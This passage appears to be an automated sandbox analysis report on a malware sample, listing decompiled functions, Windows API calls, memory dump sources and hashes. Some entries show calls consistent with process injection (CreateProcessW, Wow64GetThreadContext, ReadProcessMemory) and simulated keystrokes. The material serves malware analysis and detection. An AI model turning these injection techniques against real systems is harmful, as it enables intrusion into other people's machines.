                                                                                                        • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                        • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                                        Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __lock_file.LIBCMT ref: 00415012
                                                                                                        • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                        • String ID:
                                                                                                        • API String ID: 2999321469-0
                                                                                                        • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                        • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                                        • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                        • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                                        Function 0454D2B5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 0454DA73
                                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0454DB09
                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0454DB2B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1293200948.000000000454C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0454C000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_454c000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 2438371351-0
                                                                                                        • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                                                        • Instruction ID: 671c01e0247d191f19caa3b240b5e2219ae38f08c5e38bffcfcf004865314ba3
                                                                                                        • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                                                        • Instruction Fuzzy Hash: 6312DE20A24658C6EB24DF64D8507DEB272FF68300F1090E9910DEB7A4E77A5F85CB5A
                                                                                                        Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID:
                                                                                                        • API String ID: 4104443479-0
                                                                                                        • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                        • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                        • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                        • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                                        Function 00402780 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID:
                                                                                                        • API String ID: 4104443479-0
                                                                                                        • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                                                                        • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                                                                        • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                                                                        • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                                                                        Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 544645111-0
                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                        • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                        • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                        Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                        • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                                        • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                        • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                                        Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                        • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                                                        • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                        • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                                                        Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __lock_file
                                                                                                        • String ID:
                                                                                                        • API String ID: 3031932315-0
                                                                                                        • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                        • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                                        • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                        • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                                        Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3934441357-0
                                                                                                        • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                        • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                                                        • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                        • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                                                        Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __wfsopen
                                                                                                        • String ID:
                                                                                                        • API String ID: 197181222-0
                                                                                                        • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                        • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                                        • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                        • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                                        Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2962429428-0
                                                                                                        • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                        • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                                                        • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                        • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                                                        Function 0454E2B8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 0454E2C9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1293200948.000000000454C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0454C000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_454c000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 3472027048-0
                                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                        • Instruction ID: 5e7c23072836c714be944fc24bba39f1b9152fb80633935e911aa6835a044bb0
                                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                        • Instruction Fuzzy Hash: 40E0E67494410DDFDB00DFB8D54969D7BB4FF04301F100561FD01D2280D6309D509A62

                                                                                                        Non-executed Functions

                                                                                                        Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                        • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                        • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                        • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                        • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                        • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                        • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                        • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                        • SendMessageW.USER32 ref: 0047CA7F
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                        • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                        • ImageList_SetDragCursorImage.COMCTL32(0099ED78,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                        • ImageList_BeginDrag.COMCTL32(0099ED78,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                        • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                        • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                        • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                        • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                        • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                        • SendMessageW.USER32 ref: 0047CD12
                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                        • SendMessageW.USER32 ref: 0047CD80
                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                        • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                        • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                        • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                        • SendMessageW.USER32 ref: 0047CE93
                                                                                                        • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,033C1B38,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                        • SendMessageW.USER32 ref: 0047CF6B
                                                                                                        • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,033C1B38,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                        • String ID: @GUI_DRAGID$F
                                                                                                        • API String ID: 3100379633-4164748364
                                                                                                        • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                        • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                        • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                        • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                        Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetForegroundWindow.USER32 ref: 00434420
                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                        • IsIconic.USER32(?), ref: 0043444F
                                                                                                        • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                        • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
